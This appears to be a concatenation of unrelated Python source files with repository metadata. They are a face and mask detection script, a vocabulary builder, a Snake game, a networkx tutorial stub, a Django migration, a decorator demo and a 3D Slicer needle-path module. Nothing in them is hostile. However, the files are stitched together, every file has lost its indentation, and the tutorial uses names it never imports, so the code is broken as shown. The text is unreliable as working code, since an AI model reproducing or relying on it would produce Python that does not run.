if args["crop_faces"]:
if args["keep_only_imgs_with_masked_faces"]:
pMask, pNotMask = np.squeeze(pred)
saveCroppedImg = pMask > .3
if saveCroppedImg:
try:
imgCrop = cv2.resize(imgCrop, (224,224)) #this resizing could rise exception
cv2.imwrite(out, imgCrop)
num_faces_detected += 1
current_num_faces_detected += 1
except:
try:
cv2.imwrite(out, imgCrop) # if so, then save images as is, iwithout resizing
num_faces_detected += 1
current_num_faces_detected += 1
except Exception as e:
pbar.write(str(e))
else:
saveImg = False
if args["duplicate_img_of_faces"]:
if args["keep_only_imgs_with_masked_faces"]:
if len(faces) == 1 and saveImg:
if args["move_images"]:
shutil.move(src, out)
else:
cv2.imwrite(out, img)
else:
if args["move_images"]:
shutil.move(src, out)
else:
cv2.imwrite(out, img)
if args["crop_faces"]:
s = " masked" if args["keep_only_imgs_with_masked_faces"] else " "
msg = f"Detected{s} faces: {current_num_faces_detected} - Total: {num_faces_detected} - Percentage of faces over images: {(num_faces_detected/(img_number+1))*100}%"
pbar.write(msg)
else:
pbar.write(f"Filtered images: {num_images_filtered} - Percemtage of saved images: {(num_images_filtered/img_number)*100}%")
pbar.update(1)
except Exception as e:
pbar.write(str(e))
else:
raise FileNotFoundError("Path does not exists")
except Exception as e:
logging.log(40, traceback.format_exc())
def yieldPaths(input_path, output_path, flat=False):
for dirpath, _, filenames in os.walk(input_path):
for filename in filenames:
partialPath = os.path.sep.join([ dirpath[ len(input_path): ], filename])
src = os.path.sep.join([input_path, partialPath])
if flat:
out = os.path.sep.join([output_path, filename])
else:
out = os.path.sep.join([output_path, partialPath])
yield (src, out)
def copyDirectoryStructure(base_path, output_path):
if os.path.exists(base_path):
res = "yes"
for dirpath, _ , _ in os.walk(base_path):
structure = os.path.sep.join([ output_path, dirpath[ len(base_path): ] ])
try:
logging.info(" Creating {} path".format(structure))
if res == "yesAll":
os.makedirs(structure, exist_ok=True)
else:
os.mkdir(structure)
except FileExistsError:
msg = "Path {} already exists, do you want to overwrite it? [yes/no/yesAll/noAll]: ".format(structure)
res = input(msg)
if res == "noAll":
break
if res != "yes" and res != "no" and res != "yesAll" and res != "noAll":
print("Invalid choice")
break
else:
logging.error("File does not exists")
def copyFile(src, dst, buffer_size=10485760, perserveFileDate=True):
'''
From: https://blogs.blumetech.com/blumetechs-tech-blog/2011/05/faster-python-file-copy.html
Copies a file to a new location. Much faster performance than Apache Commons due to use of larger buffer
@param src: Source File
@param dst: Destination File (not file path)
@param buffer_size: Buffer size to use during copy
@param perserveFileDate: Preserve the original file date
'''
# Check to make sure destination directory exists. If it doesn't create the directory
dstParent, dstFileName = os.path.split(dst)
if(not(os.path.exists(dstParent))):
os.makedirs(dstParent)
# Optimize the buffer for small files
buffer_size = min(buffer_size,os.path.getsize(src))
if(buffer_size == 0):
buffer_size = 1024
if shutil._samefile(src, dst):
raise shutil.Error("`%s` and `%s` are the same file" % (src, dst))
for fn in [src, dst]:
try:
st = os.stat(fn)
except OSError:
# File most likely does not exist
pass
else:
# XXX What about other special files? (sockets, devices...)
if shutil.stat.S_ISFIFO(st.st_mode):
raise shutil.SpecialFileError("`%s` is a named pipe" % fn)
with open(src, 'rb') as fsrc:
with open(dst, 'wb') as fdst:
shutil.copyfileobj(fsrc, fdst, buffer_size)
if(perserveFileDate):
shutil.copystat(src, dst)
def countImages(input_path):
total_images = 0
for _, _, filenames in os.walk(input_path):
total_images += len(filenames)
return total_images
def write(msg):
sys.stderr.write('\r{}'.format(msg))
def run(src, out):
try:
img = cv2.imread(src)
img = cv2.resize(img, (255, 255))
bbox, _ = self.model.detect(img, threshold=0.5, scale=1.0)
if len(bbox) > 0:
if move_files:
shutil.move(src, out)
else:
self.copyFile(src, out)
num_filtered_images += 1
ratio = round((self.num_filtered_images / (img_number + 1)) * 100, 3)
self.write("Filtered imgs: {}| % Imgs saved: {}".format( self.num_filtered_images, ratio))
except Exception as e:
self.write(str(e))
def filterFace():
pass
if __name__ == '__main__':
# Initialize parser
parser = ArgumentParser(
description="Script for detecting faces in a given folder and its subdirectories"
)
parser.add_argument("-in", "--input-path",
type=str,
required=True,
dest="INPUT_BASE_DIR",
help="Path to the directory where images or folders of images are\n")
parser.add_argument("-out","--output-path",
type=str,
required=True,
dest = "OUTPUT_PATH",
help="Path of the folder where faces images will be saved\n")
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument("--keep-faces",
action="store_true",
dest="keep_only_imgs_with_faces",
help = "Set the keeping criteria to images with faces. Whether to keep images stored from [-out, --output-path] to [-in, --input-path] only if contain faces")
group.add_argument("--keep-faces-with-mask",
action="store_true",
dest="keep_only_imgs_with_masked_faces",
help = "Set the keeping criteria to images with faces that wear mask. Whether to keep images stored from [-out, --output-path] to [-in, --input-path] only if contain faces with mask")
parser.add_argument("-move", "--move-kept-images",
action="store_true",
default=False,
dest = "move_images",
help = "Whether to move kept images from [-in, --input-path] to [-out, --output-path] in such a way that in the remaining images in [-in --input-path] are the ones that did not apply the criteria.")
parser.add_argument("-crop","--crop-faces",
action='store_true',
dest="crop_faces",
default=False,
help="Crop faces detected in images and save each one\n")
parser.add_argument("-flat", "--same-out-dir",
action='store_true',
dest="save_in_same_output_folder",
default=False,
help="Whether to save all images in dirctory specified in -out --output-path and not imitate directory structure from the path specified in -indir --input-base-dir\n")
parser.add_argument("-duplicate", "--duplicate-img-faces",
action="store_true",
dest="duplicate_img_of_faces",
default=False,
help="Whether to save the original images of the extracted faces also. Only valid if -crop --crop-faces is passed as argument")
parser.add_argument("-model", "--classification-model",
type=str,
dest = "classification_model",
default="resources/model_with_1400_masked_samples.h5")
kwargs = vars(parser.parse_args())
logging.basicConfig(level=logging.INFO)
logging.info(" Preparing model...")
model = insightface.model_zoo.get_model('retinaface_r50_v1')
model.prepare(ctx_id = -1, nms=0.4)
if kwargs["keep_only_imgs_with_masked_faces"]:
logging.info(" Loading classification model...")
maskNet = tf.keras.models.load_model(kwargs["classification_model"], compile=False)
main2(kwargs)
|
[
"segaracos@outlook.com"
] |
segaracos@outlook.com
|
d8620bee26ddf112e526f48d44d148a31175bc96
|
87fe3804869e2443c14317d766a5f8716afcd5d5
|
/scripts/form_vocab.py
|
91f0f437c6d7c6af9304603454eb1f3585f4c7c5
|
[] |
no_license
|
heidonomm/mhopRL
|
dbfd296dddf87507f6bb19d58b459a4df181ea57
|
93db4dda4646412f1783a6e05f9b779005539a2f
|
refs/heads/master
| 2023-04-15T04:56:44.464898
| 2021-04-16T07:29:20
| 2021-04-16T07:29:20
| 344,776,721
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,936
|
py
|
import nltk
from nltk import word_tokenize
from nltk import WordNetLemmatizer
import json
import string
# q_string = '{"id": "3NGI5ARFTT4HNGVWXAMLNBMFA0U1PG", "question": {"stem": "Climate is generally described in terms of what?", "choices": [{"text": "sand", "label": "A"}, {"text": "occurs over a wide range", "label": "B"}, {"text": "forests", "label": "C"}, {"text": "Global warming", "label": "D"}, {"text": "rapid changes occur", "label": "E"}, {"text": "local weather conditions", "label": "F"}, {"text": "measure of motion", "label": "G"}, {"text": "city life", "label": "H"}]}, "answerKey": "F", "fact1": "Climate is generally described in terms of temperature and moisture.", "fact2": "Fire behavior is driven by local weather conditions such as winds, temperature and moisture.", "combinedfact": "Climate is generally described in terms of local weather conditions", "formatted_question": "Climate is generally described in terms of what? (A) sand (B) occurs over a wide range (C) forests (D) Global warming (E) rapid changes occur (F) local weather conditions (G) measure of motion (H) city life"}'
# q_json = json.loads(q_string)
# def state_rep_generator(q_obj):
# state = ""
# elements = list()
# elements.append(preprocess(q_obj["stem"]))
# for choice in q_obj['choices']:
# print(choice['text'])
# elements.append((preprocess(choice['text'])))
# print(elements)
# return "<|>".join(elements)
def preprocess(text):
lemma = WordNetLemmatizer()
tokens = word_tokenize(text)
tokens = [token for token in tokens if token.isalpha()]
tokens = [lemma.lemmatize(word.lower(), pos="v") for word in tokens]
tokens = [lemma.lemmatize(word.lower(), pos="n") for word in tokens]
return tokens
# print(state_rep_generator(q_json['question']))
vocab_set = set()
for letter in string.ascii_lowercase:
vocab_set.add(letter)
# with open("data/QASC_Dataset/dev.jsonl", "r") as in_dev_file, open("toy_data/dev_norm_unique_predicates.txt", "r") as in_pred_file, open("word_vocab.txt", "w") as out_file:
# for line in in_dev_file:
# line = json.loads(line)
# for stem_word in preprocess(line["question"]["stem"]):
# vocab_set.add(stem_word)
# # vocab_set.add(word for word in preprocess(line["question"]["stem"]))
# # choices = [preprocess(choice["text"]) for choice in line["question"]["choices"]]
# for choice in line["question"]["choices"]:
# for choice_word in preprocess(choice["text"]):
# vocab_set.add(choice_word)
# # vocab_set.add(word for word in preprocess(choice["text"]))
# for index, line in enumerate(in_pred_file):
# for word in preprocess(line):
# vocab_set.add(word)
# # vocab_set.add(word for word in preprocess(line))
# for word in vocab_set:
# # print(word)
# out_file.write(f"{word}\n")
|
[
"heidonomm@gmail.com"
] |
heidonomm@gmail.com
|
905d02d242aba18398fcd2c714f97a9507bde437
|
424c3cff38aab3895a277de6a08dc0592ecd42e7
|
/main.py
|
44158692bb56951d5b8312b0c986e74fc8eb21bf
|
[] |
no_license
|
kevinjavila/Snake-Game
|
90718497961d92c268da8ebd5255eb080cc975d2
|
78bc5ba524662209a2a95510839bcd52f7b322c1
|
refs/heads/master
| 2023-08-26T06:57:57.485186
| 2021-10-26T21:05:07
| 2021-10-26T21:05:07
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,748
|
py
|
import random
import pygame
class Cube:
rows = 20
w = 500
def __init__(self, start, dirnx = 1, dirny = 0, color = (255, 0, 0)):
self.pos = start
self.dirnx = 1
self.dirny = 0
self.color = color
def move(self, dirnx, dirny):
self.dirnx = dirnx
self.dirny = dirny
self.pos = (self.pos[0] + self.dirnx, self.pos[1] + self.dirny)
def draw(self, surface, eyes = False):
dis = self.w // self.rows
i = self.pos[0]
j = self.pos[1]
pygame.draw.rect(surface, self.color, (i*dis+1, j*dis+1, dis - 2, dis - 2)) # Drawing inside squares
if eyes:
center = dis // 2
radius = 3
circle_middle = (i*dis+center-radius, j*dis+8)
circle_middle1 = (i*dis+dis-radius*2, j*dis+8)
pygame.draw.circle(surface, (0,0,0), circle_middle, radius)
pygame.draw.circle(surface, (0,0,0), circle_middle1, radius)
class Snake:
body = []
turns = {}
def __init__(self, color, pos):
self.color = color
# Keeping track of head at position
self.head = Cube(pos)
self.body.append(self.head)
# Directions for moving snake
self.dirnx = 0
self.dirny = 1
def move(self):
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
# Holding the key values that can be pressed
keys = pygame.key.get_pressed()
for key in keys:
if keys[pygame.K_LEFT]:
self.dirnx = -1
self.dirny = 0
# Setting key (current head) == where we turned
self.turns[self.head.pos[:]] = [self.dirnx, self.dirny]
if keys[pygame.K_RIGHT]:
self.dirnx = 1
self.dirny = 0
# Setting key (current head) == where we turned
self.turns[self.head.pos[:]] = [self.dirnx, self.dirny]
if keys[pygame.K_UP]:
self.dirnx = 0
self.dirny = -1
# Setting key (current head) == where we turned
self.turns[self.head.pos[:]] = [self.dirnx, self.dirny]
if keys[pygame.K_DOWN]:
self.dirnx = 0
self.dirny = 1
# Setting key (current head) == where we turned
self.turns[self.head.pos[:]] = [self.dirnx, self.dirny]
for i, c in enumerate(self.body):
p = c.pos[:] # position
if p in self.turns:
turn = self.turns[p]
c.move(turn[0], turn[1])
# If on last cube, remove turn
if i == len(self.body) - 1:
self.turns.pop(p)
else:
# Checking whether we are on edge of screen
if c.dirnx == -1 and c.pos[0] <= 0: # if on left side edge, come through right side edge
c.pos = (c.rows - 1, c.pos[1])
elif c.dirnx == 1 and c.pos[0] >= c.rows - 1: # if on right side edge, come through left side
c.pos = (0, c.pos[1])
elif c.dirny == 1 and c.pos[1] >= c.rows - 1: # if on down side edge, come through up side edge
c.pos = (c.pos[0], 0)
elif c.dirny == -1 and c.pos[1] <= 0: # if on up side edge, come through down side edge
c.pos = (c.pos[0], c.rows - 1)
else:
c.move(c.dirnx, c.dirny) # else keep moving
def add_cube(self):
tail = self.body[-1]
dx, dy = tail.dirnx, tail.dirny
# Checking direction of the tail so cube can be added properly
if dx == 1 and dy == 0:
self.body.append(Cube((tail.pos[0] - 1, tail.pos[1]))) # Right
elif dx == -1 and dy == 0:
self.body.append(Cube((tail.pos[0] + 1, tail.pos[1]))) # Left
elif dx == 0 and dy == 1:
self.body.append(Cube((tail.pos[0], tail.pos[1] - 1))) # Down
elif dx == 0 and dy == -1:
self.body.append(Cube((tail.pos[0], tail.pos[1] + 1))) # Up
self.body[-1].dirnx = dx
self.body[-1].dirny = dy
def draw(self, surface):
for i, c in enumerate(self.body):
if i == 0:
c.draw(surface, True)
else:
c.draw(surface)
def draw_grid(width, rows, surface):
size_between = width // rows
x = 0
y = 0
for line in range(rows):
x += size_between
y += size_between
# Draw lines for each iteration of loop
pygame.draw.line(surface, (255,255,255), (x,0), (x, width)) # vertical line
pygame.draw.line(surface, (255, 255, 255), (0, y), (width, y)) # horizontal line
def redraw_window(surface):
global rows, width, s, snack
surface.fill((0, 0, 0))
s.draw(surface)
snack.draw(surface)
draw_grid(width, rows, surface)
pygame.display.update()
def random_snack(rows, item):
positions = item.body
while True:
x = random.randrange(rows)
y = random.randrange(rows)
# Checking if positions are == current position of snake from a filtered list
# Making sure the snack will not be inside of current snake
if len(list(filter(lambda z:z.pos == (x,y), positions))) > 0: # will continue if (values are == to positions) and
continue # greater than 0 using filter and lambda function
else:
break
return (x,y)
def main():
global width, rows, s, snack
pygame.init()
pygame.display.set_caption("Snake")
width = 500
rows = 20
win = pygame.display.set_mode((width, width))
flag = True
# Starting in the middle
s = Snake((255, 0, 0), (10, 10))
snack = Cube(random_snack(rows, s), color = (0,255,0))
clock = pygame.time.Clock()
while flag:
# Delaying the game so it's not as fast
pygame.time.delay(50)
clock.tick(10) # limiting to 10 fps
s.move()
if s.body[0].pos == snack.pos:
s.add_cube()
snack = Cube(random_snack(rows, s), color = (0,255,0))
# Checking for the collision
for i in range(len(s.body)):
# Using map to apply function lambda (variable z) to each item in s.body list
if s.body[i].pos in list(map(lambda z:z.pos, s.body[i + 1:])):
print("Score:", len(s.body))
flag = False
redraw_window(win)
pass
main()
|
[
"kevinavila32@gmail.com"
] |
kevinavila32@gmail.com
|
3d07ff6fbbfb99a178b400de391131d5e603ea46
|
f389fb4ffdbdd71c108559ecbd269304706ef7c3
|
/tutorial3/tutorial3.py
|
c287234fad183ee5484e4dd94c18c31289128b2f
|
[] |
no_license
|
petrLorenc/School-web-data-mining-tutorials
|
a04176add4cde37a0fec4d24f050d2169af52a18
|
d3d0c0a9e6945ac08fdd8f0b36661b9023ade044
|
refs/heads/master
| 2021-01-21T12:01:37.023238
| 2017-05-19T06:25:46
| 2017-05-19T06:25:46
| 91,772,927
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 604
|
py
|
import nltk
import networkx
# input text
text = None
with open('text.txt', 'r') as f:
text = f.read()
# process text and convert to a graph
sentences = [[t for t in nltk.word_tokenize(sentence)] for sentence in nltk.sent_tokenize(text)]
G=nx.Graph()
# G.add_node(...
# G.add_edge(...
# ...
# visualise
plt.figure(figsize=(20,10))
pos = graphviz_layout(G, prog="fdp")
nx.draw(G, pos,
labels={v:str(v) for v in G},
cmap = plt.get_cmap("bwr"),
node_color=[G.degree(v) for v in G],
font_size=12
)
plt.show()
# write to GEXF
nx.write_gexf(G, "export.gexf")
|
[
"petr.lorenc@firma.seznam.cz"
] |
petr.lorenc@firma.seznam.cz
|
cef0851b730719e6ec2ecdb6c1260034484790a2
|
ce6df0cd2a21fd98d2a58793816f8be09658c73a
|
/loop.py
|
98c95cd9761441e221a66e2e76c2e57395b90e8e
|
[] |
no_license
|
MikeTheFyke/Python
|
5ee6de684a0985fb28829da16982fe039884426e
|
5fde6be8e8f1c5b90028a5dcd5f39bc149cdaca4
|
refs/heads/master
| 2021-01-05T09:00:08.564586
| 2020-03-03T21:47:05
| 2020-03-03T21:47:05
| 240,965,364
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,517
|
py
|
rockosML = [
"Rocko Rama",
"Spunky",
"Heffer Wolfe",
"Ed BigHead",
"Bev BigHead",
"Filburt Turtle",
"Earl The Dog",
"Paula Hutchison"
]
print("\n--This is the start of the list--")
# Indenting in Python can define end points for for loops.
for name in rockosML:
print name
print("---This is the end of the list---\n")
# Mass Uppercasing by using The Append method to save changed data into new Array
print("\nThe same list but all in CAPS\n")
upperNames = []
for name in rockosML:
name = name.upper()
upperNames.append(name)
print(upperNames)
print("\n ---The End Is Here--- \n")
# Directions Loop
print("\nLet's Get You Moving\n")
directions = [
"turn left",
"go straight",
"turn right",
"keep going until you see the dog statue",
"turn right",
"turn right again",
"park right on the sidewalk"
]
instructions = "First "
for nextDirection in directions:
instructions = instructions + nextDirection + ", then \n"
print(instructions + "\nYou Have Arrived :)\n")
# Bacteria Loop using the range method, 10 iterations in my example
# using time.sleep method to create a pause between iterations.
print("\nWelcome to The Bacteria Zone\n")
# imported time method
import time
bacteria = "&"
generations = 10
for generation in range(0, generations):
# bacteria = bacteria + bacteria - replaced to show strings can be mulitplied
bacteria = bacteria * 2
print(bacteria)
time.sleep(0.5)
print("\nThank You Come Again\n")
|
[
"mikefyke@hotmail.com"
] |
mikefyke@hotmail.com
|
21c08f1cc6e33c90dd171f8ca67a5a0a1ef54b06
|
4f2dd2feb3d7a62c382534a563e4d823a324e5d9
|
/src/imgUpload/views.py
|
3038919b64f4ecdd9fa25f5b24356148eed74dc9
|
[
"MIT"
] |
permissive
|
codezerro/Django-Dev-To-Development-2
|
fc727d72fea3af19e15bc42429a50e159760252b
|
5e0780d2bdd8d3c5526a7cf813b14216336ed5f2
|
refs/heads/master
| 2022-12-21T23:29:35.655252
| 2020-09-22T02:31:49
| 2020-09-22T02:31:49
| 296,371,171
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 149
|
py
|
from django.shortcuts import render
# Create your views here.
def imgCompress(request):
return render(request, 'imgupload/index.html')
|
[
"kabircp08@gmail.com"
] |
kabircp08@gmail.com
|
ae30769610e5c080ac853d5fd9ad989664a4ac12
|
260aa7c38bfbae2bf7bdc17ab4e178f93bd60ec6
|
/week8/Simple Project/blog/migrations/0001_initial.py
|
781ab23cd2d83f79a2b17f7edffbccb747435a06
|
[] |
no_license
|
Orik236/Web_Orka236
|
0fe177febe193821f62cf3687865a11799662e13
|
49ddf61de35213be490b4aa08ad041231fe584e7
|
refs/heads/master
| 2023-01-09T22:22:40.846945
| 2020-04-16T22:47:38
| 2020-04-16T22:47:38
| 247,916,965
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,048
|
py
|
# Generated by Django 2.2.11 on 2020-03-16 18:07
import datetime
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
from django.utils.timezone import utc
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200)),
('text', models.TextField()),
('created_date', models.DateTimeField(default=datetime.datetime(2020, 3, 16, 18, 7, 32, 353192, tzinfo=utc))),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
|
[
"orik236@gmail.com"
] |
orik236@gmail.com
|
93c947a317a1de8748f771cbb780924f92ae327a
|
ece7df4bc7425be27a55dc74f64c8d360454efb0
|
/01_functions_are_objects.py
|
6f911c0b6382b7a4a403190bc6a9b42f008389d6
|
[] |
no_license
|
zacniewski/Decorators_intro
|
81321334fbce5638e0735e3c59a767bac3bd2d5a
|
e51a9ebcedcea29ac18d075747bd16a047c7af05
|
refs/heads/master
| 2021-01-14T11:25:34.143649
| 2014-01-02T10:54:08
| 2014-01-02T10:54:08
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 678
|
py
|
def shout(word="yes"):
return word.capitalize()+"!"
print shout()
# outputs : 'Yes!'
# As an object, you can assign the function to a variable like any
# other object
scream = shout
# Notice we don't use parentheses: we are not calling the function, we are
# putting the function "shout" into the variable "scream".
# It means you can then call "shout" from "scream":
print scream()
# outputs : 'Yes!'
# More than that, it means you can remove the old name 'shout', and
# the function will still be accessible from 'scream'
del shout
try:
print shout()
except NameError, e:
print e
#outputs: "name 'shout' is not defined"
print scream()
# outputs: 'Yes!'
|
[
"a.zacniewski@gmail.com"
] |
a.zacniewski@gmail.com
|
947921228a07d1818a52f9c16c3e1ce5adc60daa
|
1fe1ee2f53c004f804e9fe69e6615d3897b63615
|
/Snake/scoreboard.py
|
09ce5b4d4a78cabf6605f7dc4adb6329f392d0ca
|
[] |
no_license
|
jguillermo19/Python_Codigos
|
396083da6d807a5af6170b6b7e52537ab530754a
|
b48ebfacacab79c9390a9119992d76ebb10ffbc1
|
refs/heads/main
| 2023-08-18T23:23:45.932209
| 2021-09-15T20:47:44
| 2021-09-15T20:47:44
| 402,956,446
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 798
|
py
|
from turtle import Turtle, update
ALIGNMENT = "center"
FONT = ("Courier",15,"normal")
class Scoreboard(Turtle):
def __init__(self):
super().__init__()
self.score = 0
self.color("white")
self.penup() # No dibujar linea
self.goto(0,270) # Posicion
self.hideturtle() # No aparecer apuntador
self.update_scoreboard()
def update_scoreboard(self): # Actualizar Score
self.write(f"Score {self.score}",align=ALIGNMENT,font=FONT)
def game_over(self): # Juego terminado
self.goto(0,0)
self.write("GAME OVER",align=ALIGNMENT,font=FONT)
def increase_score(self): # Incrementar score
self.score += 1
self.clear()
self.update_scoreboard()
|
[
"jsandovalh1500@alumno.ipn.mx"
] |
jsandovalh1500@alumno.ipn.mx
|
2d8682112e73378bda15b48f3f96e82f212dda8b
|
96e2c852ce0ba975affacc90e31037dd3982ed4b
|
/BestPathVisualization/BestPathVisualizationLib/logic.py
|
0480871de29e0fdeecaad1423d664039cdf113d8
|
[] |
no_license
|
StefanTUHH/robotic_needle_insertion
|
9d5c3883f36ce325952e08b130bc355028ad1578
|
0b54ebcf97a0946ec3ba99cfbaef1d471482c9d5
|
refs/heads/master
| 2023-07-10T12:04:53.801630
| 2021-09-01T07:08:34
| 2021-09-01T07:08:34
| 400,170,804
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 33,514
|
py
|
import sys
from itertools import compress
from typing import Optional
from numpy import linalg
import time
from multiprocessing import Process, cpu_count, Queue
from . import overlay
from .slicer_convenience_lib import *
try:
import sklearn
from scipy.spatial import ConvexHull
except ImportError:
slicer.util.pip_install("scipy==1.5.2")
slicer.util.pip_install("sklearn")
import sklearn
from scipy.spatial import ConvexHull
try:
import pyvista as pv
except ImportError:
slicer.util.pip_install("pyvista")
import pyvista as pv
# BestPathVisualizationLogic
#
class BestPathVisualizationLogic(ScriptedLoadableModuleLogic):
"""This class should implement all the actual
computation done by your module. The interface
should be such that other python code can import
this class and make use of the functionality without
requiring an instance of the Widget.
Uses ScriptedLoadableModuleLogic base class, available at:
https://github.com/Slicer/Slicer/blob/master/Base/Python/slicer/ScriptedLoadableModule.py
"""
T0, T1, T2, T3, T4 = 0, 0, 0, 0, 0
def __init__(self, maxDistance, imageThreshold, colorbarValue, discreetStepsValue, socketReceiveSend, matrix):
self.segmentEditorNode = None
self.segmentationNode = None
self.updateCallback = None
self.doneCallback = None
self.cancel = False
self.outputPath = None
self.useHoleFilling = False
self.maxDistance = maxDistance
self.imageThreshold = imageThreshold
self.initTransform = True
self.socketReceiveSend = socketReceiveSend
self.matrix = matrix
self.colorbarValue = colorbarValue
self.discreetStepsValue = discreetStepsValue
self.arrShape = None
self.overlayTypeIndex = 0
self.maxKernelSize = 0
self.distanceWeighting = None
self.angleWeighting = None
self.gantry_pose = np.asarray(
((1., 0., 0., -1000.,), (0., 1., 0., -1000.,), (0., 0., 1., 1390.,), (0., 0., 0., 1.,)))
self.scalarData = None
self.scalarDataMoveIt = None
self.targetGlobal = [0, 0, 0]
self.targetPoint = [0, 0, 0]
def runSegment(self, inputVolume, outputModel, targetNode):
"""
Run the actual algorithm
"""
if not self.isValidInputOutputData(inputVolume, outputModel, targetNode):
return False
logging.info('Processing started')
npArrPoly = arrayFromModelPoints(outputModel)
if len(npArrPoly) == 0:
start_A = time.time()
self.segmentSkin(inputVolume, outputModel)
end_A = time.time()
self.T0 = end_A - start_A
npArrPoly = arrayFromModelPoints(outputModel)
else:
logging.info("Using previously segmented skin model")
self.initWithPreviousModel(inputVolume, outputModel)
ret = self.addOverlay(outputModel, targetNode)
if ret is None:
return False
indices, insideTransformed = ret
relevantPoints = np.asarray(self.scalarData)[indices] < self.globalMaxDensity
if len(relevantPoints) > 0 and not self.applyMaxKernel(np.asarray(indices)[relevantPoints],
insideTransformed[relevantPoints, :]):
return False
combinedArray = np.zeros((len(npArrPoly) + 1, 4), dtype=np.float)
combinedArray[0, :3] = self.targetGlobal
combinedArray[1:, :3] = npArrPoly
combinedArray[1:, 3] = self.scalarData
combinedArrayMoveIt, foundInfeasiblePosition = self.applyReachability(combinedArray, npArrPoly)
self.writeOutput(targetNode, combinedArray, combinedArrayMoveIt)
self.displayResults(combinedArrayMoveIt is not None, npArrPoly, outputModel, foundInfeasiblePosition)
logging.info('Processing completed')
if self.waypoint(100):
return False
return True
@staticmethod
def np_matrix_from_vtk(vtk_matrix):
result = np.eye(4)
for r in range(4):
for c in range(4):
result[r, c] = vtk_matrix.GetElement(r, c)
return result
def applyReachability(self, combinedArray, npArrPoly):
# Check if Points are reachable by MoveIt
combinedArrayMoveItIn = np.delete(combinedArray, 0, 0)
combinedArrayMoveIt = None
foundInfeasiblePosition = False
if self.socketReceiveSend is not None:
if self.waypoint(95, "Checking Map with MoveIt"):
return False
tf_matrix = self.np_matrix_from_vtk(self.matrix)
self.applyGantryMesh(tf_matrix)
self.applyCollisionMesh(npArrPoly)
start_E = time.time()
combinedArrayMoveIt = self.checkMoveIt(combinedArrayMoveItIn)
end_E = time.time()
self.T4 = end_E - start_E
moveItBool = combinedArrayMoveIt[:, 4]
# Create VTK Color Map
self.scalarDataMoveIt = vtk.vtkFloatArray()
self.scalarDataMoveIt.SetNumberOfComponents(0)
self.scalarDataMoveIt.SetNumberOfValues(len(npArrPoly))
self.scalarDataMoveIt.SetName("density")
toAdd = int(np.ceil((self.colorbarValue - self.globalMinDensity) / 256))
not_reachable = moveItBool == 1
np.asarray(self.scalarDataMoveIt)[~not_reachable] = combinedArray[
np.add(np.where(~not_reachable), 1), 3].flatten()
if np.any(not_reachable):
foundInfeasiblePosition = True
np.asarray(self.scalarDataMoveIt)[not_reachable] = self.globalMaxDensity + toAdd
logging.info("Finished with MoveIT")
return combinedArrayMoveIt, foundInfeasiblePosition
def writeOutput(self, targetNode, combinedArray, combinedArrayMoveIt: Optional = None):
if self.outputPath is not None and self.outputPath is not '':
string_path = self.outputPath.split('.')
targetName = targetNode.GetName()
outputPath_ColormapMoveIt = string_path[0] + targetName + '_Rob.txt'
outputPath_Colormap = string_path[0] + targetName + '.txt'
outputPath_ComputationTime = string_path[0] + targetName + '_ComputationTime.txt'
timeEstimation = "time" in outputPath_Colormap
logging.info("Saving result to file {}".format(outputPath_Colormap))
with open(outputPath_Colormap, "w") as f:
np.savetxt(f, combinedArray)
if timeEstimation:
logging.info("Saving Computation Time.")
with open(outputPath_ComputationTime, "w") as f:
np.savetxt(f, [self.T0, self.T1, self.T2, self.T3, self.T4])
if combinedArrayMoveIt is not None:
logging.info("Saving moveit result to file {}".format(outputPath_ColormapMoveIt))
with open(outputPath_ColormapMoveIt, "w") as f:
np.savetxt(f, combinedArrayMoveIt)
def displayResults(self, couldConnectToMoveIt, npArrPoly, outputModel, foundInfeasiblePosition):
if couldConnectToMoveIt:
min_point = npArrPoly[np.argmin(self.scalarDataMoveIt), :]
else:
min_point = npArrPoly[np.argmin(self.scalarData), :]
fixedLRS = slicer.vtkMRMLMarkupsFiducialNode()
fixedLRS.SetName('Opt_Surface')
fixedLRS.AddFiducial(min_point[0], min_point[1], min_point[2])
slicer.mrmlScene.AddNode(fixedLRS)
fixedLRS.SetDisplayVisibility(True)
outputModel.CreateDefaultDisplayNodes()
print("Showing resulting model")
if couldConnectToMoveIt:
outputModel.GetPolyData().GetPointData().AddArray(self.scalarDataMoveIt)
else:
outputModel.GetPolyData().GetPointData().AddArray(self.scalarData)
arrayFromModelPointDataModified(outputModel, "density")
arrayFromModelPointsModified(outputModel)
# Show pretty results
modelDisplayNode = outputModel.GetDisplayNode()
modelDisplayNode.SetActiveScalarName("density")
modelDisplayNode.SetScalarRangeFlag(1)
scalarRange = modelDisplayNode.GetScalarRange()
# Fixes issue when no point is reachable
scalarRange = (min(self.colorbarValue - 1, min(scalarRange[0], np.min(self.scalarData))),
max(scalarRange[1], np.max(self.scalarData)))
newColorSize = int(
round((scalarRange[1] - self.colorbarValue) / (self.colorbarValue - scalarRange[0]) * 256 + 256))
densityColor = slicer.mrmlScene.AddNode(slicer.modules.colors.logic().CopyNode(
slicer.mrmlScene.GetNodeByID("vtkMRMLColorTableNodeFileColdToHotRainbow.txt"), "densityColor"))
densityColor.SetNumberOfColors(int(newColorSize))
offset = 10
for i in range(256, newColorSize - offset):
densityColor.SetColor(i, 0.453125, 0, 0)
for i in range(newColorSize - offset, newColorSize - 1):
densityColor.SetColor(i, 0.875, 0.671875, 0.41015625)
if couldConnectToMoveIt and foundInfeasiblePosition:
